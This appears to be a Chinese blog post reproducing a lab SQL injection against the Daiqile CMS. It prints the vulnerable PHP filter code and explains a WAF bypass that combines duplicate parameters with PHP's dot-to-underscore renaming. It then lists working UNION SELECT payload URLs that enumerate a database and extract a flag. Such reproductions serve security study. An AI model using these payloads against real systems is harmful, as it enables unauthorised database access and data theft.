贷齐乐hpp+php特性注入

已于 2024-08-11 16:06:18 修改
阅读量735 收藏 6
点赞数 18
文章标签: php sql注入
于 2024-08-11 16:04:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60286636/article/details/141105888
版权

文章目录

运行过程

  foreach ($_REQUEST as $key => $value) {
      $_REQUEST[$key] = dowith_sql($value);
  }
  $request_uri = explode("?", $_SERVER['REQUEST_URI']);
  if (isset($request_uri[1])) {
      $rewrite_url = explode("&", $request_uri[1]);
      foreach ($rewrite_url as $key => $value) {
          $_value = explode("=", $value);
          if (isset($_value[1])) {
              $_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));
          }
      }
  }

分析可知,先进行两层waf拦截(详见下面),首先先对传入的参数使用dowith拦截,再使用dhtmlspecialchars拦截。再查询有没有submit,如果有则将id带入数据库进行查询并且返回值,如果没有submit,则直接退出。

waf

第一层waf拦截

  function dowith_sql($str) {
      $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
      if ($check) {
          echo "非法字符!";
          exit();
      }
      return $str;
  }

这个正则拦截/select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile,当发现用户输入的参数包含这些时,会直接退出程序。

第二层waf拦截

  function dhtmlspecialchars($string) {
    if (is_array($string)) {
        foreach ($string as $key => $val) {
            $string[$key] = dhtmlspecialchars($val);
        }
    }
    else {
        $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&amp;', '&quot;', '&lt;', '&gt;', '(', ')'), $string);
        if (strpos($string, '&amp;#') !== false) {
            $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
        }
    }
    return $string;
}

这层waf是先将数据分为两个,一个key,一个value,并进行检测是不是含有非法字符。

数据库查询语句

  if (isset($_REQUEST['submit'])) {
    $user_id = $_REQUEST['i_d'];
    $sql = "select * from ctf.users where id=$user_id";
    $result=mysqli_query($conn,$sql);
    while($row = @mysqli_fetch_array($result))
    {
        echo "<tr>";
        echo "<td>" . $row['name'] . "</td>";
        echo "</tr>";
    }
}

注入思路

我们得思考下如果我们有一种方法让第一层WAF检测不到恶意字符,再通过第二层WAF的覆盖,从而将恶意字符传入到REQUEST中,其实也就可以绕过WAF,完成我们的注入了。
找好了思路,那么我们就得想办法找到这个方法,这个想法之前我们说了要让第一道WAF找不到恶意字符,那么我们就得再REQUET中不得有恶意字符。其二便是$_SERVER可以有恶意字符,但是必须过我们的第二道WAF,然后再REQUEST接收。
既然上面我们从绕过WAF变为了如何让第一道WAF检测不到恶意字符,那么我们又得想一个办法。
在php中,如果传入多个名字相同的参数,那么它会取最后一个参数,那么这样,就可以绕过第一道WAF。所以传入i_d=1&i_d=2,其最终会接收到的是i_d=2。那我们便想把恶意语句放在第一个i_d。
绕过了第一道WAF,那么就该想如何绕过第二道WAF,上面绕过第一道WAF时,也给了思路,那就是将恶意语句放在第一个i_d,那就得思考,怎么在第二道WAF时让其接受第一个i_d。
php中有个小特性,那就是传入的.将会变为_,例如我们传入i.d会被转换为i_d,那么我们就要想想能不能利用这个思路来绕过。
$_SERVER[‘REQUEST_URI’]在接受时i_d和i.d是不一样的,所以,我们便可以使用这个特性来绕过。

注入

按照上面的接替思路,我们构建payload进行测试。

http://127.0.0.1/daiqile/index.php?submit=1&i_d=1&i.d=2
http://127.0.0.1/daiqile/index.php?submit=1&i_d=2&i.d=1

使用上面进行检测,当i_d=1&i.d=2时,不会回显数据,而i_d=2&i.d=1会回显数据(因为我的数据库id=2才有数据,id=1没有数据),发现事实和我们想象的一样既绕过了第一道WAF,又将i_d传入数据库。
那么接下来就可以进入正是注入。
使用/**/代替空格
查询列数并查看回显位置

?submit=1&i_d=-2/**/union/**/select/**/1,2,3,4&i.d=1

查询数据库名(改变limit查询的行数)

?submit=1&i_d=-2/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/0,1&i.d=1

最终使用下面语句查到为ctf

?submit=1&i_d=-2/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/0,1&i.d=1

在这里插入图片描述
查表名(因为使用addslashes对单引号进行过滤,所以我们使用十六进制绕过;源码中也对=进行了过滤,我们只能使用like进行绕过)

?submit=1&i_d=-2/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466&i.d=1

在这里插入图片描述
查询列名

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/0,1&i.d=1

在这里插入图片描述

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/1,1&i.d=1

在这里插入图片描述

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/2,1&i.d=1

在这里插入图片描述

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/3,1&i.d=1

在这里插入图片描述
拿下flag

?submit=1&i_d=-2/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1

在这里插入图片描述

头发巨多不做程序猿
关注
贷齐乐利用hpp+php特性进行注入
01-08
贷齐乐利用hpp+php特性进行注入
贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询)
02-22
标题中的“贷齐乐系统最新版SQL注入”指的是在该系统的最新版本中存在一个SQL注入漏洞。SQL注入是一种常见的网络安全问题,它允许攻击者通过在输入字段中插入恶意的SQL代码来操纵数据库查询,从而获取敏感信息、修改...
贷齐乐漏洞复现+php特性绕过WAF
qq_64395221的博客
08-11 772
GET/POST/REQUEST/COOKIE都会经过这个替换str_replace(array(‘&’, ‘"’, ‘’,‘(’,‘)’), array(‘&’, ‘"’, ‘’,‘(’,‘)’), $string),在我们的第一道WAF之后进行的,假设我们有一个方法让第一道WAF认为请求中没有恶意字符,再通过这里的覆盖,将恶意字符引入$_REQUEST中,就可以造成WAF的绕过了。中的最后一个参数的转换为下划线然后接收,所以我们的正常代码放在第二个参数,waf失效。
利用hpp+php特性进行巧妙的sql注入
weixin_54347738的博客
09-04 125
贷齐乐这个系统是安全问题比较严重的P2P金融类的CMS。由于连续出了多次安全漏洞,所以官方给贷齐乐系统中添加了严重影响正常使用的变态WAF。
贷齐乐系统SQL注入复现
qq_58742048的博客
08-12 602
SQL注入时学到了一个很经典的案例,贷齐乐系统,安全问题严重。由于连续出了多次安全漏洞,所以贷齐乐系统中添加了严重影响正常使用的变态WAF。两条过滤,第一条一旦遇到select,包括单引号,包括注释符,就立即exit整个流程;而第二条替换最明显的效果,就是所有的英文括号都变成中文括号,导致user(),database()等无法执行。初学看到这俩WAF确实眼前一黑,学后发现绕过十分巧妙,故做一下复现,以作记录。漏洞的挖掘、利用十分巧妙,利用了hpp+php特性,最终绕过了CMS应用中变态的WAF。
贷齐乐p2p借贷系统V2.1商业版
04-15
页面使用php技术 集理财与借款功能于一体 支持登录、注册 实名认证,手机号绑定、身份证 认证 支付宝充值、提现等功能
P2P借贷平台源码,拍拍贷借贷程序,贷齐乐借贷程序
06-04
P2P借贷平台源码/拍拍贷借贷程序/贷齐乐借贷程序,修正已知BUG,完美无错 使用前确保您空间支持PHP+MYSQL,还有伪静态,否则将无法正常使用! 使用规则位于根目录的.htaccess、httpd.ini文件,如何设置请咨询空间商! ...
齐乐手机2690产品培训资料.pptx
11-26
齐乐手机2690是一款特别为2010年上海世博会设计的音乐灯光折叠手机,具有独特的设计和出色的功能。这款手机以其创新的雪绒花呼吸灯和卓越的音乐体验为核心卖点,旨在吸引年轻用户群体。 产品概述: 齐乐2690手机...
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
2401_84413757的博客
09-10 709
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
一码空传临时网盘PHP源码,支持提取码功能
爱酷码的博客
09-11 337
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 525
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 623
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1865
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 731
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 586
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 621
访问一下 最后getshell
php+mysql日志审计管理系统
python0328的博客
09-10 475
本系统实现了:用户登陆、日志审计、监控规则、用户管理。
LabVIEW平台下的熔滴喷射关键参数测控系统设计
本文主要探讨了"熔滴喷射关键参数测控系统设计",由李杨、齐乐华等人合作完成。他们针对熔滴喷射技术中的核心要素——温度、气体压力以及激振频率对喷射质量的影响,设计了一套高效且精准的控制系统。该系统选择...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

头发巨多不做程序猿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值